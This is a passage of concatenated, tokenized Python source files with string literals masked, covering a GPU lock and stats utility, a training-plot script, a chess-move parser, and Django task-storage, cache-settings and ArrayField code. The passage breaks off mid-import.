<s> """<STR_LIT>""" <EOL> import os <EOL> import os . path <EOL> from xml . dom import Node <EOL> from xml . dom . minidom import parseString <EOL> from subprocess import Popen , PIPE , STDOUT <EOL> _dev_prefix = '<STR_LIT>' <EOL> def board_ids ( ) : <EOL> """<STR_LIT>""" <EOL> p = Popen ( [ '<STR_LIT>' ] , stdout = PIPE ) <EOL> nBoards = int ( p . stdout . read ( ) ) <EOL> return range ( nBoards ) <EOL> def _lock_file ( id ) : <EOL> """<STR_LIT>""" <EOL> if os . path . exists ( '<STR_LIT>' ) : <EOL> return '<STR_LIT>' % id <EOL> else : <EOL> return '<STR_LIT>' % id <EOL> def owner_of_lock ( id ) : <EOL> """<STR_LIT>""" <EOL> import pwd <EOL> try : <EOL> statinfo = os . lstat ( _lock_file ( id ) ) <EOL> return pwd . getpwuid ( statinfo . st_uid ) . pw_name <EOL> except : <EOL> return "<STR_LIT>" <EOL> def _obtain_lock ( id ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> os . symlink ( '<STR_LIT>' , _lock_file ( id ) ) <EOL> return True <EOL> except : <EOL> return False <EOL> def _launch_reaper ( id , pid ) : <EOL> """<STR_LIT>""" <EOL> from subprocess import Popen , PIPE <EOL> me = __file__ <EOL> if me . endswith ( '<STR_LIT>' ) : <EOL> me = me [ : - <NUM_LIT:1> ] <EOL> myloc = os . path . dirname ( me ) <EOL> if not myloc : <EOL> myloc = os . getcwd ( ) <EOL> reaper_cmd = os . path . join ( myloc , '<STR_LIT>' ) <EOL> Popen ( [ reaper_cmd , str ( pid ) , me , '<STR_LIT>' , str ( id ) ] , <EOL> stdout = open ( '<STR_LIT>' , '<STR_LIT:w>' ) ) <EOL> def obtain_lock_id ( pid = None ) : <EOL> """<STR_LIT>""" <EOL> id = - <NUM_LIT:1> <EOL> id = obtain_lock_id_to_hog ( ) <EOL> try : <EOL> if id >= <NUM_LIT:0> : <EOL> if pid is None : <EOL> pid = os . 
getpid ( ) <EOL> _launch_reaper ( id , pid ) <EOL> except : <EOL> free_lock ( id ) <EOL> id = - <NUM_LIT:1> <EOL> return id <EOL> def obtain_lock_id_to_hog ( ) : <EOL> """<STR_LIT>""" <EOL> for id in board_ids ( ) : <EOL> if _obtain_lock ( id ) : <EOL> return id <EOL> return - <NUM_LIT:1> <EOL> def free_lock ( id ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> filename = _lock_file ( id ) <EOL> os . rename ( filename , filename + '<STR_LIT>' ) <EOL> os . remove ( filename + '<STR_LIT>' ) <EOL> return True <EOL> except : <EOL> return False <EOL> def nvidia_gpu_stats ( ) : <EOL> p = Popen ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , stdout = PIPE ) <EOL> output = p . stdout . read ( ) . lstrip ( ) <EOL> try : <EOL> doc = parseString ( output ) <EOL> gpucounter = <NUM_LIT:0> <EOL> templist = [ ] <EOL> memlist = [ ] <EOL> uselist = [ ] <EOL> fanlist = [ ] <EOL> doc2 = doc . getElementsByTagName ( "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> gpulist = doc2 . getElementsByTagName ( "<STR_LIT>" ) <EOL> for gpu in gpulist : <EOL> temp = gpu . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> temp2 = temp . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> templist . append ( str ( temp2 . firstChild . toxml ( ) ) ) <EOL> mem = gpu . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> memtot = mem . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> memused = mem . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> memfree = mem . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> memtot_str = str ( memtot . firstChild . toxml ( ) ) <EOL> memused_str = str ( memused . firstChild . toxml ( ) ) <EOL> memfree_str = str ( memfree . firstChild . toxml ( ) ) <EOL> memtot_float = float ( memtot_str [ : - <NUM_LIT:3> ] ) <EOL> memused_float = float ( memused_str [ : - <NUM_LIT:3> ] ) <EOL> memfree_float = float ( memfree_str [ : - <NUM_LIT:3> ] ) <EOL> memlist . 
append ( '<STR_LIT>' % memused_float + '<STR_LIT>' % memfree_float + '<STR_LIT>' % memtot_float + '<STR_LIT>' ) <EOL> use = gpu . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> uselist . append ( str ( use . firstChild . toxml ( ) ) ) <EOL> fan = gpu . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> fanlist . append ( str ( fan . firstChild . toxml ( ) ) ) <EOL> gpucounter += <NUM_LIT:1> <EOL> return [ uselist , memlist , fanlist , templist ] <EOL> except : <EOL> return [ [ - <NUM_LIT> ] * len ( board_ids ( ) ) ] * <NUM_LIT:4> <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> div = '<STR_LIT:U+0020>' + "<STR_LIT:->" * <NUM_LIT> <EOL> import sys <EOL> me = sys . argv [ <NUM_LIT:0> ] <EOL> if '<STR_LIT>' in sys . argv : <EOL> if len ( sys . argv ) > <NUM_LIT:2> : <EOL> try : <EOL> pid = int ( sys . argv [ <NUM_LIT:2> ] ) <EOL> assert ( os . path . exists ( '<STR_LIT>' % pid ) ) <EOL> except : <EOL> print '<STR_LIT>' % me <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> else : <EOL> pid = os . getppid ( ) <EOL> print obtain_lock_id ( pid ) <EOL> elif '<STR_LIT>' in sys . argv : <EOL> try : <EOL> id = int ( sys . argv [ <NUM_LIT:2> ] ) <EOL> except : <EOL> print '<STR_LIT>' % me <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if _obtain_lock ( id ) : <EOL> print id <EOL> else : <EOL> print - <NUM_LIT:1> <EOL> elif '<STR_LIT>' in sys . argv : <EOL> print obtain_lock_id_to_hog ( ) <EOL> elif '<STR_LIT>' in sys . argv : <EOL> try : <EOL> id = int ( sys . argv [ <NUM_LIT:2> ] ) <EOL> except : <EOL> print '<STR_LIT>' % me <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if free_lock ( id ) : <EOL> print "<STR_LIT>" <EOL> else : <EOL> owner = owner_of_lock ( id ) <EOL> if owner : <EOL> print "<STR_LIT>" % ( id , owner ) <EOL> else : <EOL> print "<STR_LIT>" <EOL> elif '<STR_LIT>' in sys . 
argv : <EOL> stats = nvidia_gpu_stats ( ) <EOL> print div <EOL> print "<STR_LIT>" % '<STR_LIT:abc>' <EOL> print div <EOL> for id in board_ids ( ) : <EOL> print "<STR_LIT>" % ( id , stats [ <NUM_LIT:0> ] [ id ] , stats [ <NUM_LIT:1> ] [ id ] , stats [ <NUM_LIT:2> ] [ id ] , owner_of_lock ( id ) ) <EOL> print div + '<STR_LIT:\n>' <EOL> else : <EOL> stats = nvidia_gpu_stats ( ) <EOL> print div <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' % me <EOL> print '<STR_LIT>' <EOL> print <EOL> print "<STR_LIT>" % me <EOL> print "<STR_LIT>" % me <EOL> print <EOL> print "<STR_LIT>" % me <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT:\n>' + div <EOL> print "<STR_LIT>" <EOL> print div <EOL> for id in board_ids ( ) : <EOL> print "<STR_LIT>" % ( id , stats [ <NUM_LIT:0> ] [ id ] , stats [ <NUM_LIT:1> ] [ id ] , stats [ <NUM_LIT:2> ] [ id ] , stats [ <NUM_LIT:3> ] [ id ] , owner_of_lock ( id ) ) <EOL> print div + '<STR_LIT:\n>' </s>
<s> from deepnet import deepnet_pb2 <EOL> import matplotlib . pyplot as plt <EOL> import glob , sys , gzip , numpy as np <EOL> def preds ( metrics_list ) : <EOL> y = [ ] <EOL> for metric in metrics_list : <EOL> count = metric . count <EOL> y . append ( <NUM_LIT:100> * ( <NUM_LIT:1> - metric . correct_preds / metric . count ) ) <EOL> return y <EOL> def get_plot ( v , skip , label ) : <EOL> y = v [ skip : ] <EOL> x = np . arange ( skip , len ( v ) ) <EOL> return plt . plot ( x , y , label = label ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> plt . ion ( ) <EOL> proto = sys . argv [ <NUM_LIT:1> ] <EOL> proto = glob . glob ( proto + "<STR_LIT:*>" ) [ - <NUM_LIT:1> ] <EOL> print proto <EOL> skip = <NUM_LIT:0> <EOL> if len ( sys . argv ) > <NUM_LIT:2> : <EOL> skip = int ( sys . argv [ <NUM_LIT:2> ] ) <EOL> model_pb = deepnet_pb2 . Model ( ) <EOL> f = gzip . open ( proto , '<STR_LIT:rb>' ) <EOL> model_pb . ParseFromString ( f . read ( ) ) <EOL> f . close ( ) <EOL> train = preds ( model_pb . train_stats ) <EOL> valid = preds ( model_pb . validation_stats ) <EOL> test = preds ( model_pb . test_stats ) <EOL> x = np . arange ( len ( train ) ) <EOL> plt . figure ( <NUM_LIT:1> ) <EOL> p1 = get_plot ( train , skip , '<STR_LIT:train>' ) <EOL> p2 = get_plot ( valid , skip , '<STR_LIT>' ) <EOL> p3 = get_plot ( test , skip , '<STR_LIT:test>' ) <EOL> plt . legend ( ) <EOL> plt . xlabel ( '<STR_LIT>' ) <EOL> plt . ylabel ( '<STR_LIT>' ) <EOL> plt . draw ( ) <EOL> raw_input ( '<STR_LIT>' ) </s>
<s> import re , sys <EOL> def main ( argv ) : <EOL> for line in sys . stdin : <EOL> piece , from_location , to_location , surround = line . split ( "<STR_LIT:\t>" ) <EOL> fields = line . strip ( ) . split ( "<STR_LIT:\t>" ) <EOL> if len ( fields ) == <NUM_LIT:4> : <EOL> piece , from_location , to_location , surround = fields <EOL> elif len ( fields ) == <NUM_LIT:3> : <EOL> piece , from_location , to_location = fields <EOL> else : <EOL> continue <EOL> from_location = from_location . split ( "<STR_LIT:U+002C>" ) <EOL> to_location = to_location . split ( "<STR_LIT:U+002C>" ) <EOL> if len ( fields ) == <NUM_LIT:4> : <EOL> print "<STR_LIT>" % ( piece , int ( to_location [ <NUM_LIT:0> ] ) - int ( from_location [ <NUM_LIT:0> ] ) , <EOL> int ( to_location [ <NUM_LIT:1> ] ) - int ( from_location [ <NUM_LIT:1> ] ) , surround ) <EOL> else : <EOL> print "<STR_LIT>" % ( piece , int ( to_location [ <NUM_LIT:0> ] ) - int ( from_location [ <NUM_LIT:0> ] ) , <EOL> int ( to_location [ <NUM_LIT:1> ] ) - int ( from_location [ <NUM_LIT:1> ] ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . stderr . write ( "<STR_LIT>" % sys . argv ) <EOL> main ( sys . argv ) </s>
<s> from django . db import transaction <EOL> from greenqueue . models import TaskResult <EOL> from greenqueue . exceptions import ResultDoesNotExist <EOL> from . base import BaseStorageBackend <EOL> from ... import settings <EOL> try : <EOL> import cPickle as pickle <EOL> except ImportError : <EOL> import pickle <EOL> import base64 <EOL> class StorageBackend ( BaseStorageBackend ) : <EOL> def get ( self , uuid , default = None ) : <EOL> try : <EOL> result_obj = TaskResult . objects . get ( uuid = uuid ) <EOL> except TaskResult . DoesNotExist : <EOL> if default is None : <EOL> raise ResultDoesNotExist ( ) <EOL> return default <EOL> _val = base64 . b64decode ( result_obj . result ) <EOL> return pickle . loads ( _val ) <EOL> @ transaction . commit_on_success <EOL> def save ( self , uuid , value ) : <EOL> if settings . GREENQUEUE_IGNORE_RESULT : <EOL> return <EOL> _val = pickle . dumps ( value ) <EOL> tr = TaskResult . objects . create ( uuid = uuid , result = base64 . b64encode ( _val ) ) <EOL> return value </s>
<s> import functools <EOL> from importlib import import_module <EOL> import django <EOL> from django . utils . safestring import mark_safe <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> DJANGO_18 = ( django . VERSION [ : <NUM_LIT:2> ] == ( <NUM_LIT:1> , <NUM_LIT:8> ) ) <EOL> def load_class ( path ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> mod_name , klass_name = path . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> mod = import_module ( mod_name ) <EOL> except AttributeError as e : <EOL> raise ImproperlyConfigured ( '<STR_LIT>' . format ( mod_name , e ) ) <EOL> try : <EOL> klass = getattr ( mod , klass_name ) <EOL> except AttributeError : <EOL> raise ImproperlyConfigured ( '<STR_LIT>' . format ( mod_name , klass_name ) ) <EOL> return klass <EOL> def safe ( function ) : <EOL> @ functools . wraps ( function ) <EOL> def _decorator ( * args , ** kwargs ) : <EOL> return mark_safe ( function ( * args , ** kwargs ) ) <EOL> return _decorator </s>
<s> from . base import BaseCompressor <EOL> class IdentityCompressor ( BaseCompressor ) : <EOL> def compress ( self , value ) : <EOL> return value <EOL> def decompress ( self , value ) : <EOL> return value </s>
<s> DATABASES = { <EOL> "<STR_LIT:default>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> } <EOL> SECRET_KEY = "<STR_LIT>" <EOL> TIME_ZONE = "<STR_LIT>" <EOL> LANGUAGE_CODE = "<STR_LIT>" <EOL> ADMIN_MEDIA_PREFIX = "<STR_LIT>" <EOL> STATICFILES_DIRS = ( ) <EOL> MIDDLEWARE_CLASSES = [ ] <EOL> CACHES = { <EOL> "<STR_LIT:default>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } , <EOL> } <EOL> INSTALLED_APPS = ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from collections import Iterable <EOL> import json <EOL> import django <EOL> from django import forms <EOL> from django . core . exceptions import ValidationError <EOL> from django . core . serializers . json import DjangoJSONEncoder <EOL> from django . core import validators <EOL> from django . db import models <EOL> from django . utils import six <EOL> from django . utils . encoding import force_text <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> TYPES = { <EOL> "<STR_LIT:int>" : int , <EOL> "<STR_LIT>" : int , <EOL> "<STR_LIT>" : int , <EOL> "<STR_LIT:text>" : force_text , <EOL> "<STR_LIT>" : float , <EOL> "<STR_LIT>" : force_text , <EOL> } <EOL> def _cast_to_unicode ( data ) : <EOL> if isinstance ( data , ( list , tuple ) ) : <EOL> return [ _cast_to_unicode ( x ) for x in data ] <EOL> elif isinstance ( data , str ) : <EOL> return force_text ( data ) <EOL> return data <EOL> def _cast_to_type ( data , type_cast ) : <EOL> if isinstance ( data , ( list , tuple ) ) : <EOL> return [ _cast_to_type ( x , type_cast ) for x in data ] <EOL> if type_cast == str : <EOL> return force_text ( data ) <EOL> return type_cast ( data ) <EOL> def _unserialize ( value ) : <EOL> if not isinstance ( value , six . string_types ) : <EOL> return _cast_to_unicode ( value ) <EOL> try : <EOL> return _cast_to_unicode ( json . loads ( value ) ) <EOL> except ValueError : <EOL> return _cast_to_unicode ( value ) <EOL> class ArrayField ( six . with_metaclass ( models . SubfieldBase , models . Field ) ) : <EOL> empty_strings_allowed = False <EOL> def __init__ ( self , dbtype = "<STR_LIT:int>" , type_cast = None , dimension = <NUM_LIT:1> , * args , ** kwargs ) : <EOL> self . _array_type = dbtype <EOL> type_key = self . _array_type . split ( "<STR_LIT:(>" ) [ <NUM_LIT:0> ] <EOL> self . _explicit_type_cast = False <EOL> if type_cast is not None : <EOL> self . _type_cast = type_cast <EOL> self . 
_explicit_type_cast = True <EOL> elif type_key in TYPES : <EOL> self . _type_cast = TYPES [ type_key ] <EOL> else : <EOL> self . _type_cast = lambda x : x <EOL> self . _dimension = dimension <EOL> kwargs . setdefault ( "<STR_LIT:blank>" , True ) <EOL> kwargs . setdefault ( "<STR_LIT:null>" , True ) <EOL> kwargs . setdefault ( "<STR_LIT:default>" , None ) <EOL> super ( ArrayField , self ) . __init__ ( * args , ** kwargs ) <EOL> def get_db_prep_lookup ( self , lookup_type , value , connection , prepared = False ) : <EOL> if lookup_type == "<STR_LIT>" : <EOL> return [ self . get_prep_value ( value ) ] <EOL> return super ( ArrayField , self ) . get_db_prep_lookup ( lookup_type , value , connection , prepared ) <EOL> def formfield ( self , ** params ) : <EOL> params . setdefault ( "<STR_LIT>" , ArrayFormField ) <EOL> if django . VERSION [ : <NUM_LIT:2> ] >= ( <NUM_LIT:1> , <NUM_LIT:6> ) : <EOL> params . setdefault ( "<STR_LIT>" , forms . TypedMultipleChoiceField ) <EOL> if self . choices : <EOL> params . setdefault ( "<STR_LIT>" , self . get_choices ( include_blank = False ) ) <EOL> params . setdefault ( "<STR_LIT>" , self . _type_cast ) <EOL> return super ( ArrayField , self ) . formfield ( ** params ) <EOL> def get_db_prep_value ( self , value , connection , prepared = False ) : <EOL> value = value if prepared else self . get_prep_value ( value ) <EOL> if not value or isinstance ( value , six . string_types ) : <EOL> return value <EOL> return _cast_to_type ( value , self . _type_cast ) <EOL> def get_prep_value ( self , value ) : <EOL> return value if isinstance ( value , ( six . string_types , list , ) ) or not isinstance ( value , Iterable ) else list ( value ) <EOL> def to_python ( self , value ) : <EOL> return _unserialize ( value ) <EOL> def value_to_string ( self , obj ) : <EOL> value = self . _get_val_from_obj ( obj ) <EOL> return json . dumps ( self . 
get_prep_value ( value ) , <EOL> cls = DjangoJSONEncoder ) <EOL> def validate ( self , value , model_instance ) : <EOL> if value is None and not self . null : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT:null>' ] ) <EOL> if not self . blank and value in validators . EMPTY_VALUES : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT:blank>' ] ) <EOL> for val in value : <EOL> super ( ArrayField , self ) . validate ( val , model_instance ) <EOL> def deconstruct ( self ) : <EOL> name , path , args , kwargs = super ( ArrayField , self ) . deconstruct ( ) <EOL> if self . _array_type != "<STR_LIT:int>" : <EOL> kwargs [ "<STR_LIT>" ] = self . _array_type <EOL> if self . _dimension != <NUM_LIT:1> : <EOL> kwargs [ "<STR_LIT>" ] = self . _dimension <EOL> if self . _explicit_type_cast : <EOL> kwargs [ "<STR_LIT>" ] = self . _type_cast <EOL> if self . blank : <EOL> kwargs . pop ( "<STR_LIT:blank>" , None ) <EOL> else : <EOL> kwargs [ "<STR_LIT:blank>" ] = self . blank <EOL> if self . null : <EOL> kwargs . pop ( "<STR_LIT:null>" , None ) <EOL> else : <EOL> kwargs [ "<STR_LIT:null>" ] = self . null <EOL> if self . default is None : <EOL> kwargs . pop ( "<STR_LIT:default>" , None ) <EOL> else : <EOL> kwargs [ "<STR_LIT:default>" ] = self . default <EOL> return name , path , args , kwargs <EOL> def db_type ( self , connection ) : <EOL> return "<STR_LIT>" . format ( self . _array_type , "<STR_LIT>" * self . _dimension ) <EOL> def get_transform ( self , name ) : <EOL> transform = super ( ArrayField , self ) . get_transform ( name ) <EOL> if transform : <EOL> return transform <EOL> try : <EOL> index = int ( name ) <EOL> except ValueError : <EOL> pass <EOL> else : <EOL> index += <NUM_LIT:1> <EOL> return IndexTransformFactory ( index , self ) <EOL> try : <EOL> start , end = name . 
split ( "<STR_LIT:_>" ) <EOL> start = int ( start ) + <NUM_LIT:1> <EOL> end = int ( end ) <EOL> except ValueError : <EOL> pass <EOL> else : <EOL> return SliceTransformFactory ( start , end ) <EOL> class IntegerArrayField ( ArrayField ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs . setdefault ( "<STR_LIT>" , "<STR_LIT:int>" ) <EOL> super ( IntegerArrayField , self ) . __init__ ( * args , ** kwargs ) <EOL> class SmallIntegerArrayField ( ArrayField ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs . setdefault ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> super ( SmallIntegerArrayField , self ) . __init__ ( * args , ** kwargs ) <EOL> class BigIntegerArrayField ( ArrayField ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs . setdefault ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> super ( BigIntegerArrayField , self ) . __init__ ( * args , ** kwargs ) <EOL> class TextArrayField ( ArrayField ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs . setdefault ( "<STR_LIT>" , "<STR_LIT:text>" ) <EOL> super ( TextArrayField , self ) . __init__ ( * args , ** kwargs ) <EOL> class FloatArrayField ( ArrayField ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs . setdefault ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> super ( FloatArrayField , self ) . __init__ ( * args , ** kwargs ) <EOL> class DateArrayField ( ArrayField ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs . setdefault ( "<STR_LIT>" , "<STR_LIT:date>" ) <EOL> super ( DateArrayField , self ) . __init__ ( * args , ** kwargs ) <EOL> class DateTimeArrayField ( ArrayField ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs . setdefault ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> super ( DateTimeArrayField , self ) . __init__ ( * args , ** kwargs ) <EOL> class ArrayFormField ( forms . 
Field ) : <EOL> default_error_messages = { <EOL> "<STR_LIT>" : _ ( "<STR_LIT>" ) , <EOL> } <EOL> def __init__ ( self , max_length = None , min_length = None , delim = None , <EOL> strip = True , * args , ** kwargs ) : <EOL> if delim is not None : <EOL> self . delim = delim <EOL> else : <EOL> self . delim = u"<STR_LIT:U+002C>" <EOL> self . strip = strip <EOL> super ( ArrayFormField , self ) . __init__ ( * args , ** kwargs ) <EOL> def clean ( self , value ) : <EOL> if not value : <EOL> return [ ] <EOL> if isinstance ( value , list ) : <EOL> return value <EOL> try : <EOL> value = value . split ( self . delim ) <EOL> if self . strip : <EOL> value = [ x . strip ( ) for x in value ] <EOL> except Exception : <EOL> raise ValidationError ( self . error_messages [ "<STR_LIT>" ] ) <EOL> return value <EOL> def prepare_value ( self , value ) : <EOL> if isinstance ( value , ( list , tuple ) ) : <EOL> return self . delim . join ( force_text ( v ) for v in value ) <EOL> return super ( ArrayFormField , self ) . prepare_value ( value ) <EOL> def to_python ( self , value ) : <EOL> if value is None or value == u"<STR_LIT>" : <EOL> return [ ] <EOL> return value . split ( self . delim ) <EOL> if django . VERSION [ : <NUM_LIT:2> ] >= ( <NUM_LIT:1> , <NUM_LIT:7> ) : <EOL> from django . db . models import Lookup , Transform <EOL> class ContainsLookup ( Lookup ) : <EOL> lookup_name = "<STR_LIT>" <EOL> def as_sql ( self , qn , connection ) : <EOL> lhs , lhs_params = self . process_lhs ( qn , connection ) <EOL> rhs , rhs_params = self . process_rhs ( qn , connection ) <EOL> params = lhs_params + rhs_params <EOL> var = "<STR_LIT>" % ( lhs , rhs ) , params <EOL> return var <EOL> class ContainedByLookup ( Lookup ) : <EOL> lookup_name = "<STR_LIT>" <EOL> def as_sql ( self , qn , connection ) : <EOL> lhs , lhs_params = self . process_lhs ( qn , connection ) <EOL> rhs , rhs_params = self . 
process_rhs ( qn , connection ) <EOL> params = lhs_params + rhs_params <EOL> return "<STR_LIT>" % ( lhs , rhs ) , params <EOL> class OverlapLookup ( Lookup ) : <EOL> lookup_name = "<STR_LIT>" <EOL> def as_sql ( self , qn , connection ) : <EOL> lhs , lhs_params = self . process_lhs ( qn , connection ) <EOL> rhs , rhs_params = self . process_rhs ( qn , connection ) <EOL> params = lhs_params + rhs_params <EOL> return "<STR_LIT>" % ( lhs , rhs ) , params <EOL> class ArrayLenTransform ( Transform ) : <EOL> lookup_name = "<STR_LIT>" <EOL> @ property <EOL> def output_type ( self ) : <EOL> return models . IntegerField ( ) <EOL> def as_sql ( self , qn , connection ) : <EOL> lhs , params = qn . compile ( self . lhs ) <EOL> return "<STR_LIT>" % lhs , params <EOL> class AnyBaseLookup ( Lookup ) : <EOL> comparator = "<STR_LIT:=>" <EOL> """<STR_LIT>""" <EOL> def as_sql ( self , qn , connection ) : <EOL> """<STR_LIT>""" <EOL> lhs , lhs_params = self . process_lhs ( qn , connection ) <EOL> rhs , rhs_params = self . process_rhs ( qn , connection ) <EOL> params = lhs_params + rhs_params <EOL> table = self . lhs . alias <EOL> pk_name = qn . query . model . _meta . pk . name <EOL> table_dot_pk_name = "<STR_LIT>" % ( table , pk_name ) <EOL> return "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" . format ( table_dot_pk_name = table_dot_pk_name , <EOL> pk_name = pk_name , table = table , <EOL> arrayfield_name = lhs , <EOL> comparator = self . comparator ) % ( <EOL> rhs , ) , params <EOL> class AnyStartswithLookup ( AnyBaseLookup ) : <EOL> lookup_name = "<STR_LIT>" <EOL> comparator = "<STR_LIT>" <EOL> def process_rhs ( self , qn , connection ) : <EOL> wildcarded_rhs_params = [ ] <EOL> rhs , rhs_params = super ( AnyStartswithLookup , self ) . process_rhs ( qn , connection ) <EOL> for param in rhs_params : <EOL> param = "<STR_LIT>" % param <EOL> wildcarded_rhs_params . 
append ( param ) <EOL> return rhs , wildcarded_rhs_params <EOL> class AnyIStartswithLookup ( AnyStartswithLookup ) : <EOL> lookup_name = "<STR_LIT>" <EOL> comparator = "<STR_LIT>" <EOL> class AnyEndswithLookup ( AnyBaseLookup ) : <EOL> lookup_name = "<STR_LIT>" <EOL> comparator = "<STR_LIT>" <EOL> def process_rhs ( self , qn , connection ) : <EOL> wildcarded_rhs_params = [ ] <EOL> rhs , rhs_params = super ( AnyEndswithLookup , self ) . process_rhs ( qn , connection ) <EOL> for param in rhs_params : <EOL> param = "<STR_LIT>" % param <EOL> wildcarded_rhs_params . append ( param ) <EOL> return rhs , wildcarded_rhs_params <EOL> class AnyIEndswithLookup ( AnyEndswithLookup ) : <EOL> lookup_name = "<STR_LIT>" <EOL> comparator = "<STR_LIT>" <EOL> class AnyContainsLookup ( AnyBaseLookup ) : <EOL> lookup_name = "<STR_LIT>" <EOL> comparator = "<STR_LIT>" <EOL> def process_rhs ( self , qn , connection ) : <EOL> wildcarded_rhs_params = [ ] <EOL> rhs , rhs_params = super ( AnyContainsLookup , self ) . process_rhs ( qn , connection ) <EOL> for param in rhs_params : <EOL> param = "<STR_LIT>" % param <EOL> wildcarded_rhs_params . append ( param ) <EOL> return rhs , wildcarded_rhs_params <EOL> class AnyIContainsLookup ( AnyContainsLookup ) : <EOL> lookup_name = "<STR_LIT>" <EOL> comparator = "<STR_LIT>" <EOL> ArrayField . register_lookup ( ContainedByLookup ) <EOL> ArrayField . register_lookup ( ContainsLookup ) <EOL> ArrayField . register_lookup ( OverlapLookup ) <EOL> ArrayField . register_lookup ( ArrayLenTransform ) <EOL> ArrayField . register_lookup ( AnyStartswithLookup ) <EOL> ArrayField . register_lookup ( AnyIStartswithLookup ) <EOL> ArrayField . register_lookup ( AnyEndswithLookup ) <EOL> ArrayField . register_lookup ( AnyIEndswithLookup ) <EOL> ArrayField . register_lookup ( AnyContainsLookup ) <EOL> ArrayField . 
register_lookup ( AnyIContainsLookup ) <EOL> class IndexTransform ( Transform ) : <EOL> def __init__ ( self , index , field , * args , ** kwargs ) : <EOL> super ( IndexTransform , self ) . __init__ ( * args , ** kwargs ) <EOL> self . index = index <EOL> self . field = field <EOL> def as_sql ( self , qn , connection ) : <EOL> lhs , params = qn . compile ( self . lhs ) <EOL> return "<STR_LIT>" % ( lhs , self . index ) , params <EOL> class SliceTransform ( Transform ) : <EOL> def __init__ ( self , start , end , * args , ** kwargs ) : <EOL> super ( SliceTransform , self ) . __init__ ( * args , ** kwargs ) <EOL> self . start = start <EOL> self . end = end <EOL> def as_sql ( self , qn , connection ) : <EOL> lhs , params = qn . compile ( self . lhs ) <EOL> return "<STR_LIT>" % ( lhs , self . start , self . end ) , params <EOL> class IndexTransformFactory ( object ) : <EOL> def __init__ ( self , index , field ) : <EOL> self . index = index <EOL> self . field = field <EOL> def __call__ ( self , * args , ** kwargs ) : <EOL> return IndexTransform ( self . index , self . field , * args , ** kwargs ) <EOL> class SliceTransformFactory ( object ) : <EOL> def __init__ ( self , start , end ) : <EOL> self . start = start <EOL> self . end = end <EOL> def __call__ ( self , * args , ** kwargs ) : <EOL> return SliceTransform ( self . start , self . end , * args , ** kwargs ) <EOL> try : <EOL> from south . 
